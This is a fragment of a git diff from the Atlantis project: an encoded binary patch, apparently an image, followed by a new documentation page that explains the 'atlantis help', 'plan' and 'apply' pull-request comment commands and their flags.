zmjn`4CS;Xb|FRGgHYN(+($aprVhX^rAQgakl@f{MHN=BX$~J%}JfG)FNTd}$^C~Q#
z(?GJ@P`Ar<11Z4d2g)cJ`1dILaLD_bSJNz#nYmAM3TremhVA}Lnnd$LfhKyOU-^Iy
z!n82f=<>;FjT*AmalE39`_6_pBhcttiuwbKSv0PJ>=l9X{cG9F{y%3UbVjzrKftdv
za{%ipBiG^4Ydnh5v=80AL_asPb3qJxXV$3ysD(zSR<OS+7x1p?roZ%%mu2poc-^IZ
zPN(|zFWuo6S89I<<M&WEG3cfe0S^Ig+;lTIH`?XA<rPl^HG&_xX{XYU*(7@sFh%<$
zmgsNelTM0{R+ID1?<@2_WFI4z7~Y-;4h>A9z?JHj>@o4GBvv`BS0Hn2uWGQo6u7P#
zdFD4YDJ8ekjMp8-^`9$os@`dH6g!%mTUSp<B>#;Le2TwqdLZKs49Gi!SrZGvI3{eL
zQ@iWy_)?p?6<&5oSv!o-s%qxzSB=qufeuBzY~fA<!K<JO5AS7#Lq6kZQA^kCZ3x!s
zx1MCoabs`&6StaBZ|R}wGzB{M7>_HCTxU+fc__VXf@6kx)B2_6{sI~v-|St@kAu4b
znNjZayZPxS6&kOzukdK=n>Ir~LQqq_mnUSm3gX);UrPa74O*I}y4NXV0J3eKnyO1T
zLErJ%-;h_g;oRYI9!ySnWidfN7xYlajvF#Do9!#ePK@9_`2<}>CgVrX<4vLA)Y?p2
z3~5wp#9S+!%+{ut;o2s8)wEfLbo||TiBo~BPK`EB8zPBV$VzLd3X?Zr6(Q<nOd!A#
z9rZR^3g@G<5rz=w^zo%t-Qmk3EPe{(FvHKDo%beNp7=*QIKs@vY@6yPXA5QRPbgo}
zNIf_nSnsz4pU1qc5#3iFOVV(rxiuWQPv{aJ-MR1A-f3RuYc(3{miCroVzMk`XqBr0
zY?5Eb(MhSR35j@m*1|t;R2^8>`A+3!Y3*n+iIYG%!<kyUu1W4YxBL6%CXSB>9r(+Z
zPd^hGe_RP4H>{?Cxoz-595~7al@KYaHunHt+EcwG)O!d(zzV}V4rq^<d#Z(}wzWQ|
z48Dvdc3RI=@I&9~o`?L+j*Ej<Ab<g063h^h*y;5*CL~ttp#_c?028r?K6k6zI031L
znItywLEB^U=(FZ}LA14L&Mc^trsf;jD}l&uot%1jE5#k`lZTaxIjA<!gUYkKdF4wr
zA}xHfB~mZHz@3El_)9$Hsd8H|BpKZdj7<MkpSky_BAu71q9BLathDMuS6N-N(>H=+
zLcYXQ<_7n=6m^*482wmO70<iKX;qGw>V3|t=$RUd&dK?kac!Pw|A5*g9y34mdqKfu
z^@)So*vkoDU|hU%p>;gXB-4p!UTJ%e*(LD3DW9nKhU?#Us=fxG?V4ELvJ{{WiPWWS
z$bILVxZ99l06eu=L;cH@E#4<Ket{|cy|Z$2uMcxi=FUEzp`N@CP}fG9KYq>e&CRi~
zZx)ou4Yw_;YADC`N3n}f&DE)Q@Zb;EXO(jd8nMnU!&Sndq*yQA)LJizavZxIksuyn
zTR!utiH#mu(Ine@&06?Z*zYrt5H+xP)0m%%7L^=uzc3TisG@R}%8|J1<^;B~x~=f2
zjv!X<5g@WX-qf;_GXHom{b`uoQosqrcGDw{JrCSQ5f%1MFXc4y##MtdIX!J=wgX55
zD?7D$mi-}|wU4Z8t#F;A-FAXwt)~z4kEh}5JQD3U@wf$|Us~&LAbJ0`?;$J%S?_N}
zoFB3o3h_zV^bekq+E?^t5^T}~Vb9z^t}fid$!a9xnE5Wkp>sW5E@$*`<xp#(cFn-U
z;+?v7r6kSEJz1``TJd0nlwsX~Y9ChHXxcSPE#aYw^+t8@LTw5VJq3u7BAvoIUmHe~
zVne{oF1N2YFxX2hc586{5&K#6p$E8QbIlIpHNo{#KXDap-pPtVJ2S5wSeG#7#C=u$
zGFI#xmR6Wp9;LK!4p(cjpw4@^?qT2N#V>GGhC-uTB}VXkpi6nl+PamA?O?}?cx=6b
zV7)c-Zc*ys2i+L!f?<20-qy|Z+0y)Ov+~QN`^B<??+NxDx6CNyPHG9kcH>Oke3|tR
zYlXY(-20`t_mmaP-5Hu!<I+z#M`-;=^UB(Gsc&+%Ry-6k9Is1qYl|)G^&N$7TaoMD
zP1iY6)!K}SYA9697e?aIOlIFOa5$~<T^*(*+hqE=+W_kbGfbZKu`jA}t%hw!@9r;B
zja|~F^INJ5ZO7VpC%joLRMpiJ;|An=kGZEdehqIcSGP%qPn#7pQDt>|?JqL)KBu7_
z9DJmz(d#slO^C7oqUw0EB6*}aNqtbL^qoL=q($<Ec7FY?W@S{<;b>2rIK9!V%!}#x
z?Fe;5&7fBj$I<yugou-wlG@1JQpg8q`3LfW^eIo7S|?P`(zx`pX_n|<ZMwGNrmMYN
zf|_EWbktUoH{C>$a%&C=nJQj0UM7Apf!xDM+S9Su&6csooogl?Qonrb75@!MbAh2{
zeU04;NM1#82V9OrRS#Qu4h2nkt_AZ#yPR|dwbm16rT6RRXc+DfoF_kr_njPMYwIIR
z*#GLDhhTub375T4)FM$zXxJD52=5sTEv}W9&&T*oOpIoSkrk|QCG&ScjTRnJtQ9oK
zu-bmJ+>&WarSpvoCCAZd@Donid369F75V&!afY2gRe}xA)k&OO?E)~>-lWmfUAX|~
zQ1k8?AIsz6W#1Umd9TN{6-<0?y92VWvEpI9j&w8-^nkl@UmM|^WfVQ(9KfBzBlS4z
zLDl9mQn^LbD(5sAjIF*r*jNmwjyo91PsuoYHgjqdbAETPaPvIYhUH(}zzsYfi+6Z3
zT~?V~<YT|o+EIRHuD*<>I>g!0vqWq;p{p{FLri;#?s*vk{Ui%?d+%el^%T<wT9tSR
zY^qXOq*YTrLtiTbZow4}I;{bmDV<h@f%N3e&=cDCgGMlBbJc@SpV#LP9KYUh%`6xu
zaqpu84f&JpqG#|r8JWHIgOU4<_ZQb#O?ETL^?VM(p7RItSBh*Usbi`-xr;kqTu&<%
zgsFfy48~hdDrE3XT%zi}Wlcswb#vj=$%Us%If-!F4sq<l-1%<V%PF@B+a7zRqNi!g
z#@tb@a;nih-B5d-yfLks*D3f6;ipe{T*mWNN+e}?XhwTL5!bP=(pbEr>2u4p%<rh2
zhY}7P2Z>mYC=X{V%`)?(y?E@{4G$LevOizulx5~hz+c_#GhGVkZC+ntvngfM5|ntR
z*Q2>{>Ja^9i#Lh{Vn)!eyi+=a0<%~FjZj1R3u0Z@*xtkD9BQCbzM;uJ>s8yt@RDW?
z&@9#IkhaQN*}Isa6)4iEX<<paQb|Q7orpGNrkq-MsKP$)YT&K8zl)liyTBpr?i%r&
z`CWdgfnT8STOzhi_l9qhR7#tYKRm&x&zSw&6K&Rq6YQ~O%T>qQRkzc(Gu3WTu*p1$
zS+Qj)Ta>#N)JJ$Uh_oLzpKjOg2=*3#TD(!^8*Arrj@;nf>Kx!uby=KuN-{*gf<<vt
z1DsaTiD8;%ihsGw1|Sv;Tvb_;dOjF0-?Q^RIXb5WPp&<R)*L=7cKq<P8x9-Ez9#&s
zZ0rp9^7e58|LizcPV=rjy$<Wm%jxhNn=(}TYU@U5RhWSqPZ)g1BSE>m8S4gNx>*aN
z8|20kheVoQ2bF-Wghj)rk$NvSZPk%;=XI~9?d#;J6Tq}Dmgw_E7Ecob$2CDFED4Pd
z9IqK?{y7ylms{8)vrX9j0@^v}<eGsrj<@_5^Z@(i{l@6s;kHtzG`Dx&><?S^>Joxw
zi5cnmTkt%GgX3}b%x3G*%L2o)51bnhnmee7xbf<Z)mmFMmX&2qwoznAXXuiODn@xj
z-;3bxJbAl+G&U{P55`@@+iw>%U$uS!cYW8as*+b#B9&X5<|?XdG$4$4n%+h7SD$_8
z_tx3sve11)2>}I#UC72uF}$DY^Nf0L9)9n<Hi7BTu=88vyaf?h*Oeoc^!F{{3nfqT
zL9IM>fs7V!jxy*dr<_!S>hPvjXs&rRpf^+ZDO58RG*Jx0=T!&_B0eXl$qm@XAo@9*
z%{B0MG_&4JD0^S5Ox8Er_3=8ct;V!tL9@U-2O|1GM<2QAUrTDJ>g41TB;#mdi{V-P
zv}>>&Zc(S<OwH9zpI8cOfO<@Y4>*jGD-j2dOvd`c=kIl`Eay@UALrIBs2<$)T1~=3
zf@%=}+yb;`>=AJ?4m~sRpO5$~=@N?FjcMVqP>*b@1K)O90O}2LpC5aLRjR%B$9TO^
z8=5&%G7icxO%5b1Rdy8VresqB&n-m+Y6vqumXi0~hiAXs9q;U&aRwE?WZqHgG>UyF
zYf**=&#nqKpYGUk(6Tzcbn#NrL_$(HSr2S7JG@x--MSwH{mkx_=3(;Pv-L>2-5Si(
zW6rXfvHoK2LE9)5lhJPJi<@Xl^*e&1d@Jn3X6+%u%!!!%gZ%;TEE!kz`6jbUBPl1(
z=I4xwtIbr5S#ZTGwhpM?R201TC;3GA?^WtM-&Z%yoy0kR=RWT?gNJ?mXvS`Q=09U<
zmRUbEd@dsx^de*YZoddUu5NLL)Bft$fTZVup*WDXMVK{pqT7Ay%KBi&dH7<5|ETHR
zc*2VA<{9}@9bfrilHreG4Y^_4gr1QGkyNgc8ME^cSdD#GD=J|;112sJ-2%aLdnJv>
zIGsce=27VW!$Q%#$m!=+`*>d4>Yk?s&OoA*(^zJw9DClKP82jQ%WA3T%6a!Zny1f0
z^_LUVhUk-0SKXv@!FxS8bgC!*sckSUo%(ZHk=1jk!%~RJ<5@UlJUPq9q2y^dcYob>
z{Quy&uM#{83O9(cro7KQg6ST*H{~Z$MTnHM&!R_VWmS#~lHXI8CFT-KzpLw%9;Yi6
zG}s5RIMp(TcZd?&+aE48sB<)!`Sd%X7qUH3;T$fPPP0Sr73_z9Pn>4lABr}o!&_-Z
z_76A**B<w7fb(!h@PJ>zdL(f4vw9fSjnheL-jv<P$}}t2nwG7<Ym)%ZB-3E*jbvNb
z8pc`h$9@~yzYcG{`U$!8#9G@+ytMR?@7Dej6^InB+cNt@(k?2AUm)E)?_iF~?}6Py
z<7+iuS;7|k!UaiA%Y_U#i)I;(7<r0uveL>?W6i}z{~W>I{W5>fc?T==W0Y}RviX2U
zoWrQ2;)(bup`KsR6{1%%_vjbR_?MxF9+P2j;7J23VHCE|Z2gHbFW1Nio-GGXQ4%_K
zVjFf)zJt><%u4-5wI#h<m^XpnC?U~_*u(XGt=@``Gc<Ua9LXURvMxH1Nm)N#7yq2b
z>m_uUQN%x*N5tQIQ8gGZMR%jT#tatraVEqq3X(xp4QT`Kc%)7p^L?X{o{MBWZE~r+
zBJXvpP3?g$$Ya)jIYZnhV4viA%nW}iGjv-vvVELl4d2j8)~25{!mxO<DH{5zcFaxj
zbyeZ(mKFSWPQ#iZ+TDfr;qpm8XzOVN+1;2zoP3_5WuiIbTy$OrVfYj!!X5g^)@$&Q
z!%*U6W`=F+V(uFpE;m1speI_iq4Yxafx6ipOXkh_7!K-=@}zuv-oLs=Cd8lx@RQ#*
z3%{=t9LhH$Ase^jxGaRyCA7m%>=6mc8qVf8o?0ZmowTo(lq*@O&CYXGgr@r`o<8Ff
z`)XAM!av5TrB12U6%@?$?OVV6WO21hcMotoW*>o~B+<<dKf-vtkcq?~wa~crk+GxE
zyZmWRu(zWPe7knA+$?FV^$^c@5iI2?>HNOVdN&wX&;O1YYCkpBJgs`L!)MjT{TC#V
z?l8WujeelGGYS?8ji?%{qYTHC4tfE>t%rhaPyVG!6lgV7#a`w<gMtEKraZvD6-cKJ
zIQ_CZ`N*$o+HZ+bC~IttRlw2OjZePiwyv?=ePxx+i%9LQI1snQ|C6HAYAm<6PSr5?
zqV!JcK{3}dQ1WVhFuwM4MXT4Yg3$4Kt>rXsA)IwoqlA45k3CHsX>$Dst$Ff!)|sW9
z!~9D0#Y+UN-6)6pRrlPw>zBzwy4?$uha>xE{&0uQ>&aP$>`8m?8Pq^1&^GtN67aM&
zmBuNojot@!8sB!|8%8zo-G22A-o(ut&bCqTc=6UPz`WU^{`(^10I=JzE6977F%ji$
zgW~w1irEz|^jQQLYfM0?xdqfuh8UwaB_1+uX}i)W7Z#0qz1#!L%KOp_tnCx5D*o*l
zQR5-i?(=P`wD7W$0^TLARxQUa&Z#>?QKD((3^OTZ*N)#|f#BtTV}u5X5qVeJR-XX7
z{C-S7SpK<#_c$;XJ)SmzMNXOKZsh0$_xp7;`TvT$&Zwrgb*q3Pf`D*@L$`n^3hJRs
z=qN=bs0c_G5vd^v#0VjTCPk%K0BNC_gx-4<L{NGs5Fm)ugeIK?$lKg|&K=`%;m7;+
zeq>~1jFq+5nqS##eQVCW8);%IlgepgAblbnpABO)oGk>8-o6>nkuB-kn{zv-Thae}
zF-uNyQCHPm)SVVBBUm|-yS!J!TA;yDeAS<y+P@;W5_V64u>9%@8zk%OIj^(cWlEc?
z8DBUq77U)`7Jz%Wc%-WSDsmb!wmPbUmsUGY*$IRt>YG>VkPW@CXI|YFGpW7(?Y4}*
zHT4Cx(Bg{H_SG`?2jADe=2Q+8p3Cws4q(_F8t?@FKA+$|MC-xw`nL;6ZO(mwk$#A#
z!NV;`gMC|Ehyd18!wu+Lk3@+(&#jdfpAYp_ti2cN^VEj3-y?_AupttV#m*I%Uh2ZP
zf>r%Odr`D`2ME64K0yX*Wc)m&t@CnMe*p(_eKEIMN2t68Da0#$i%$;D$kf%IUMY?F
z_KGq^)G6NlK!+@#P$OX5)fh?X@vtEG@w)X5{7qhV;j4-Ee2UkG7RukE8hxg3n=3o{
zPn!atwRVqke<$c`9kq3Eu!Vwqlv=K@XeRsxpiJV5ygCpsLRJteqi2OL{oJ}<m`xFY
z1svxe(HjX<xJ8{F9Od{~OCr`_Er}ap<cl$+=P&h6%@9mS!e{K`45#~dHoh9f;`Y}`
z8%%)X$NqY=+CY`_j7$qIV|2_M3-c&s!}U6(g`7$iG>hNDa(a!H(;Qq@6(ZIg`MX;R
zgQ6wi@Ht$F)lyD)+Gof_Z}O{ocxSQ=$Oc0_&Uay?^_i&qB}n?ny5;R}U<170g28-Y
z-wpC3ShiAnqffk~(gv+U`auMH4V#~NWm6JoZ_3jkMMvuvM&##LyCQECVBtlLDEwpZ
z?<%#ph@G^ZcymYP-oDz3JIp(U$G5+oR}3_(T_=0K8F&s>_h+d5k+H=#Q+4AS!uHdx
zjKUR*pcSc=*?jrYm<Js5E^I8CAl$pr4tdW2GzGb6k~_sp=K#7PE^ZVZR$*f6Q6nOx
z&||KopoPz0M(W0F7Z}QM@;iWHFKeC1?KUJp$Jz$nRyC}QmxzI^qGWBtCccnSo!&1X
z*LJ9}=S@`$<yM>lyM<5(nKCT-L=}$b_#F@n4O~?Z;kt`X5~b;L6uCryU&v|+WGz$_
ztO(d%{1&^V51YPH;{GtSv+Z(xb{)<<O(%%;UfdFUJraW6UwZAl1r*_R8QLIzbRqo0
z!}(9&TNDnS*uC)JQ-sqwzn=bJRkcA@o7TkC)l-f|plaY9T4u?p4Lrs?J0tSh&3bQ)
zvDlBC2R6@UE*Tq|U|F4tQDcM>NXeWbE;qCHnNINw)0zmQ*yQ-vEc2s<rs98@+Ud2h
zh;KfReBo}N9ma#~gLQ;wJGsQ9HnMQ^w+W?6I(xJbtJgdgZ0pIM6a0%WvPbD)EWHSD
z#$-INm4?gBq;1xqOnqFN*riLXtdAP4BF3chz07^lwAxuuhfz)6K~6L#vr4Nb@txnF
z15A;xJa<F3hN2?VO;SXSe31wfd(OvUH&LI$X1S~c_y<IQoL#4xm~&1Ob}vR>&gJRl
z#V_h>UsEe?4R_+rm4vl6`(;klTq{$}`w&(9z17ege1)KM-st9FqzMJH5w~=b=gSK=
zAI&((y+k*<Q+TpyyV6N(C!u4DKQq*k$JbKhIaxTIVv?ViwBFk!S#>$gR#;dx?3_+H
z<IXpT?cPd=G_uxE%bROYAViL=@sG&=<xYE*eTCccCrHTgXS8FHx2;X6&)Asn1$Ww{
zl~p8UqU!N3)nsW_*2H+cwcd3X8bh9WEP17I0RHS%CcobPnwi~GAp2?@pLB&W3p+$C
zb?6?W%oCyMT`KTT5pMzWj)@LDB%m2bvADq_sG$lqgKG%OxEhO`1W-#+I@A<0GoaBY
zlR?a}!-bhfrJKdwiRi~-ri5zML9PkX6A(gYAE@uyh{R-0=EI6tr+9c`9Q5C%_h%C_
zbmPA3coaGJnP5t)cDt?D(=yDjOk#vm{N1ZgT}3b=3n7bBSJ>>|=FT|}B%+?bZ_HgS
z>Dl6e%qBz}{k<TIf7TQ|=yZ&Bnu{Y~QFZL5_#D5{pLwKLL^5szHBtM?llCNDuzcz%
ztbJ`U>0XYk1V~kuVyjWs+%Mfzhv=HwST}@VG}eK~-ccMnsZ+LV!+8t7lwK;oQONu8
z^JlnndU2?@Or~q%CwU$VcoEHXYm+j`bDKyKD_wi_v-gnhO8D=<$|{i7ququ!-VG?<
zt&$7mq+hUUX?2*E#Y{0hLRjj4MBeNQ9Rc+vz4Iu^qxUGf;`Z)O3$9CdBCfl9ylCcq
zt8F~ea%R1&XEhr+ZXss3<!(A;7Xr6W)z?sd9LLK@d(l@FOcvN+iMmVp=oyRBcNn;N
zI&ny&*@&RgjF!Ob!Q0C;gKjJ2?m`Wn2w7{HPW_F{s4g|O&-(pd*rA$J$>w}jX^?xC
zMGnPL?TMM(v_cW~OLKk8;JVD;Ec?!EeKqzdNDsjhhC;r#PI1JSRF_N%jO0(e<850F
zWEz-l7YPq+eYBMLDY%7ai@cyvledmIGw+I88QQU5@|ePgHhbCR6cOU&i&`DhTf-8H
zw}##PMWvSu!Px~;pLM8#maq}3{CGSc-M|lJs<R?uMTIXe_e9mSg1uGT8RZ*u(VkX?
zw0TxfuU&$Cb|DQWK);6WNlE176<+Nw)Y<*4w98U=*|hpj>3aF2Tnd!iR#na8hkUm9
zJ18-@gw!qK&R+KPn-1@F;W8e#hNOC8i5%iB7ejAp?7Nmq#{5(ksmkNSanCgBjVh20
ze{>wFEo^AVHwnHjv(GOb5s8KPFF`$y|1?+iL)@b!t*lLhI@0PMRydVt=<eWGYCu|-
zc3dhn+LlFZ7!#aruBF{K9Lkav?dW$U%*juGQRUsrJo=*jSz8swxq7kfsg&2;FZp8A
zwiHaulmltIm`mf?Y;TKZCR{W9@p4=2rVzAFKaiN+!U#(<?i{^*O}rR_o+tYDXVVvg
zGcvC{w1Sp=FIbXN!}1J&H$E9aC$o|?9Mkqb5)*a$<e4^9t4#dvkbaQAcyPJ$19r~*
zz^eUBJr$=t8qBX|1IN=^6KCt}4U4WP>$e{j6C*rIoeU8?FL%nb*d=baz|%3b<k)DQ
zYQ7<;B%|fENOKXAb6c}QT=ip*m}%mM0=Tk(ut{|8ZCYW4;1XeNj!V+&j7u0Yno_B;
z3g!D<@pF2;2APBA8>bl}%h9Dg^c$Ovsu0N|BeYdXiU-sd$wm9?c9(y^WFac`jo`^Y
z`Xe+gyUlTw9CM)FkPFiLrR;8S<+y6Sh|GoLvo3E|R$D8r`$UP|EPP9=Z$I=Ggx6P=
z0=0`A1J6c<Ev$DRu`<6v@`LqAeG_bI(e_vlI!%&eSn?!YX!<YhiL=Rffo1b;H-)-~
z*i+tm1$EE?yP{JMuAyI6V!dbi1fcJEn38pNCImc^FIu>{wjG6%J0=T7?S_^6JxtMq
zI{MhqhoI?5$j6<rnaeeyKMJKOXeQpy%lI4;sW=wa7Vssh7Niw%Oq6Zt?yECO9d+ut
z1HnC&73<u2#MCW)seai`iGfiTM>Jn9XmqVlv=Y~-%a3UnAKnn}wZ0%~pT0Px?i~L)
z@kPh`O6ccyUh0xKX;9)(``{LGtEaAHU5@HG;(6bw1KVBtb{(=5Kd8@%3+rba{+2cT
zq%x|M_LnqeR8u-Bl~9Te)h~u|32zbxp!oTU_0RNP(o;wGNA%Pl=}>UvV~t}9BNKS~
zHZx~ENQOs^0jGPVB$E6S!&e{2&7BJ+A(A|c+)y?s%M61oZCrf1D19LdxRb1dzE^4&
zZN7nRv-p#*>VD8q3YBW)i0S~9tae^9_57}gUsQJMloOA85rs5W_Kdh!@bvX@vl}gz
z^;CSa|MChb?d4>2@**ggS5fOy5hhgP<W<N-jn(7M+9=@U6#<`Zb)<1Tiu!h$Xx-@{
zZ`+wH7EgO?v2)eODRF|##!T!EN&dh!T>3V1dZBKrk(uMOv>p)y+Rgtq(C?Js$hRVh
zx>q9BVo2_bSy_#_roI&4DXi)Tge<m=Yl*EC1b5Dq?AQ%CzA-;Hn499XGe9A?K<(_c
zUEnhoGG*Q$B+C{+T*@yKuv`@7j{X>K)}G5F1c#MoHtFff@ZwQaieexG)4IGcyNi;t
zYeZn8TUCL0*3M>v2ZbC>pvS0F&R-448!>So%zNXWw-aXIeCb3rG#JyyQeGD&TQDd!
z`jt{g0&NEGJS?{<=4wyGm7d%Y_!;Yw92%=c@)lo}mE5=<D)^$N0zRT=!#6OqQ(kC3
z=}CIWld4DqZ#yo-Jm-{m)gaPOXGG+4I?gqVQNf9|H}xc=vex^)3Mp+`Ebpr=`>03)
zbS5cIFEOGFj~@e$Mmov)UgVa`kco4g^4s0Vp(|1gVd<hmPlz9#9~Cz<Pp2;)gEL-p
z-Mv5=-_`fabyQ$x6a36*LDf=TB<Tv?F>LK(0-knlapW8U>v?>KyY^-NJdRz)@tiOV
zK4&^8Aq&AAk3u^Nw%456TK{p87G&6u(48KR9XRDZRckmheKk?hj9b}^y&&3GUp|lJ
z-7(-*fy}-eilz7*BaOr?f^rdsN}j1LCU@C4jS<jYLV@mZ;9;eD)@Ov%T5Eh!*+}|Y
zu3VqH-^T#?DHEM2NRQ+O*7E)GW>T`raXSTe8pTF0x`i&1+xF6}o_+hpRT*6h;hZJn
zFLtll8@`Mf>qY#YKuFCi+Z0DF_M!qB!{-DZB)m3&k{f@o6ctDD;V|<!KEWzYbcot+
zH{s;!5}t?BYFv4V^bYH-4(%_-!I|RkQ?|@Pz32Q*$g`~)^6=FiUJ`LJ8IAM~hID#a
zZXR#*1+6gb4?HX<5P0&A3lp4LQ9$wq7hOLW1B6{d3=a=wBrbE++&HpZvfJsyQ|bo^
z3=TJ#I1|SKva$A<BZ}#BG74ph5z#DE&s>9*CQ{W6=&{$9)CtD>(bCI_MI`AfZnk-?
zH-A}nH@Nu`8!e2Mu!2ats43JsrZ%{jEFqqNtg+Ro_xnLhCAO`KTmA8ph$6kH1|d>%
zyf<MqzR{)yTZiTV(>~ZY|2hh5fg>1}Gs`c-Hy*X(-b3^vQrNay5lkI7QyEDYX>UU=
zO?x>MGBzr2XPuN`v}I?hnHS;PgbzJRBbZU8SZW4F*#@tdo3#)T+8d+FKbonFd|q=m
zW@IbYu`RGC10{8`oMXnb(;fD!A8(^$cPB`{O9l(zUl%Ec)ld4&LjR;~e4lKo>0bF@
zI~&@!u8R=$)pi2|^>t^q5tpy`&UARI=y}@^A1_|Nr{83r(vQx3IP{o061)CtWquo6
z@hjwp{MD8fU$Q1<v~q)M$3A;ye#36M49te8SX<eUw(hrF_0YBnef+(!(*P`LF8?&G
zo%fIJ5x8ZFd!L#va_$(iriZ7mRKsH^3L6$Ah`S%X(Q{>ECo#&nuOiVi(z$v<b0Gyi
zeH(=W>!U3{uSJGw=T#NV*L)3{&8n$8x)V`v^U8B4M09Q3NJ3BVOm}Z}hdr;-G94_#
zYSPTAkn3(@vM9~?k2J@mcJr`q%vXu~i_S9D=jPHLStfBmQ_3x+-{H>6?CB?(DLqsK
z1&-vorjEwlH0{`S3l&33>>_L?ckk7f&v7K+qeVjN(>(Uw<vZ^JJF_;1#O6|6?Af~6
zrlsrW1_3t<HICu&oQ{K3Oz#x8x9|o@)<pkgK127@Z)Io{ZUIU}jFxH=Wa=ys%5I~2
zD=6n{3b_dz3aB|vfu_Z<AxnBtiGfWd+-+JOtXCD@(qd3httM_N_mw98F^(L{%#nU>
zQskRhiA)j1k?;@{zLoINr_D}&xqt&QWSGv+=a$p@!vHj`&Cied=D0SG8feb2)!`fb
zj(V1}Tq%$N7I0+E(9CeQ|E&>c9g&^YoY35?tdhM^V2mNpj~bUZ=P%pbgcPGJ6xI1N
zUGDz|PfproWZi9^#n*Ay-^##{tDFCV03{e>kMfd+UhrgZX*;-le7^a|j}oe}^3eOI
zu+riOrt=mBe-$7uLu<=s;n64dZ+ae>0VRiTsH3r|TR#92S0F$T04Nj{0C%EdETSjQ
zUmCmN?icWS1mWJ8H97RlE3=e|RqrkPi8EC{)yEVoYdOuTyzSw|dFiLM`Glo>B})$^
z^(RRHJFAL-&8n_r?{8?iM7(z5>;&KZQO@#;Q&_Iav8B{*Jcz8=5l3wb^_M64p{X7j
zsu7*T)pa}j_h@_Fzc&WP9D|Sr6QZ(I)#6=c?-XyV)(e_8Q46?h`b|tzus6dcO76DD
zp9>o7)*hV<2RPV;vSqUS&z*qsi%J2&5fetRHCa(laE#~alhWQRYq@|4d8ul(FBdZ9
z?=-Cc;)dw=(-ZKGM{E4g)?KUnuj8wKRdGVE0cTj7ShIXqV5agu<4e}?h_Q!@*RIqK
zs58Hg#b9L<@!HccsE{kvFMyrZ;y~(lXByzdq0K+OkuCs)Y$431yr_a!T8T*5Me(5|
zBS=R8R>Auj;=Gyik_u)kN@|%H_kS4Bucfnf=}+{7n7V+tkYHd6qhmY(kRx>Yz)C4N
z^omjTZGaHU6)(4QN%BH<<JBX$4DhEVN;HxD^BCDcAhiNSxJ-0^qPerWw0@s_uNa~C
zcA@<crn%2qU!w0tKwx3#x_q2?T~X1TXSO}Ud&2r_*d6nYfj*PU>hsG?)J^B;67kiU
z@}Qx{X5;(0d58|d`9aRiKQE9VTL+V&KkmsBVsgR~1382n^epFebyM2zELmEIw}C&E
zj_>icJf+>eRVvI^D^vww-r?(a*a&QODCOy{nA3Gm45cSJ4)QN{J1@Y9jk1%kVF1yt
z_vjxuA<(Za9vR7VUa7y9NKr=fU4GJpwO-}g9(f|mtBNV+&1re}5}p%A{8ajcms+O9
zt?uIiGeMl^<qA*F`O@#ZCI0>M2|(awS2vRo*z@KBos=r_Rkw*O*M~+)V=PP1+_diI
zadVTBnum$d;q-d(%A#zqQe3)+xMVM^)=-}0<Fq!9HyK$mO^3X>Tj@N{0rnZodRo+^
z#&8&Qwt9~`8(OaZ3Hbi=#I*w_u5!dzjtemVuXgSJjMKuxjvd_+2a`m#GysU6&h^Pb
zIe`#_v-hbVXrZGFW`Ijeu%Kl^fy?&Dxp5!dol4S;J+i6#JIA@mBdYZl&!7KwpmUx$
z+nKeO=$jK`Wkt2L+Pran`-`amj;x4JK(mlRD3iIPUqHZul34hE@#X&Y$IE-9xhDdG
zY;7W1!9f;DtOs`o$Pj?>k)|7rLjkjO27fX;d9YR4gY$ujzV$8l(ggsDy;yaa-l!oH
zXjip<mt)|~*>fSFXzYG^#J^XxD&4?3R@gkc5#<jgsM_$fbBEwE287p=&JzA9FmGLr
zw$S}Y3xDTj-{U~Sllm0FJeLjNJo@^%(jonIdhOwCn^*t`_~nB+xSt0D6X63iW5U~q
zSlIXl+*(v69fET@AR&pkQ!OA00dW2hmc)B-cRnhLdpP?xTn+_@ot<T9vr~uRi~;bw
z3M+qc3&1(}>VNI}|1o#NUOTfFI<7{q&z>u%M)x0rv+EwtMyQLo9D#eu@b(X;`<7z+
z))@cUV|*^~;S@GA^GfKRtJR|@^rZa(2vVd-XUZS_t>)@Jaj=_fodyQ`$L!2Y2duKz
zBS2XAGJ^|tm@<Ps`0N-1QxnqjvLwfO{F326wC2Mi_y1kZBdTS`^}_iuLEIc5h^tr1
zzYlmY1JkLl)T@U%UeTThliNn_0=ErI`h$T~Ir|*&6AoPNdn^{v9Q8y>?caF(?KThg
zM3KkjZ;r-lMX*B^)sTn9#SC!OF36^^2Jn5uZ}L#x91C#WCqB(0jzGMnjRfsqPyN%q
z@5?<MA#PObT?M=FXD!X1y9ZB1>m=Y2pJy5y92iv9o~&^fAFOoq?FG`Z*8DCss-II>
ziWww(aI>Qf>;Kj;T<ZOsTy==hjot1)Cygo*UviHgVvC49(LqR$k+!}*Fv{6Gyng?L
z)&E|<Tn0pu5p)UsP+eiI;8MY4rNg4z-S^RPCYq3H=1k|eS8BX~!uN>wZSbuewa0${
E1A--qssI20

literal 0
HcmV?d00001

diff --git a/runatlantis.io/docs/pull-request-commands.md b/runatlantis.io/docs/pull-request-commands.md
new file mode 100644
index 0000000000..1aed3d0c01
--- /dev/null
+++ b/runatlantis.io/docs/pull-request-commands.md
@@ -0,0 +1,39 @@
+# Pull Request Commands
+Atlantis currently supports three commands that can be run via pull request comments (or merge request comments on GitLab):
+
+![Help Command](./images/pr-comment-help.png)
+## `atlantis help`
+View help
+
+---
+![Plan Command](./images/pr-comment-plan.png)
+## `atlantis plan [options] -- [terraform plan flags]`
+Runs `terraform plan` for the changes in this pull request.
+
+Options:
+* `-d directory` Which directory to run plan in relative to root of repo. Use `.` for root. If not specified, will attempt to run plan for all Terraform projects we think were modified in this changeset.
+* `-w workspace` Switch to this [Terraform workspace](https://www.terraform.io/docs/state/workspaces.html) before planning. Defaults to `default`. If not using Terraform workspaces you can ignore this.
+* `--verbose` Append Atlantis log to comment.
+
+Additional Terraform flags:
+
+If you need to run `terraform plan` with additional arguments, like `-target=resource` or `-var 'foo-bar'`
+you can append them to the end of the comment after `--`, ex.
+```
+atlantis plan -d dir -- -var 'foo=bar'
+```
+If you always need to append a certain flag, see [Project-Specific Customization](#project-specific-customization).
+
+---
+![Apply Command](./images/pr-comment-apply.png)
+## `atlantis apply [options] -- [terraform apply flags]`
+Runs `terraform apply` for the plans that match the directory and workspace.
+
+Options:
+* `-d directory` Apply the plan for this directory, relative to root of repo. Use `.` for root. If not specified, will run apply against all plans created for this workspace.
+* `-w workspace` Apply the plan for this [Terraform workspace](https://www.terraform.io/images/state/workspaces.html). Defaults to `default`. If not using Terraform workspaces you can ignore this.
+* `--verbose` Append Atlantis log to comment.
+
+Additional Terraform flags:
+
+Same as with `atlantis plan`.
\ No newline at end of file
diff --git a/yarn.lock b/yarn.lock
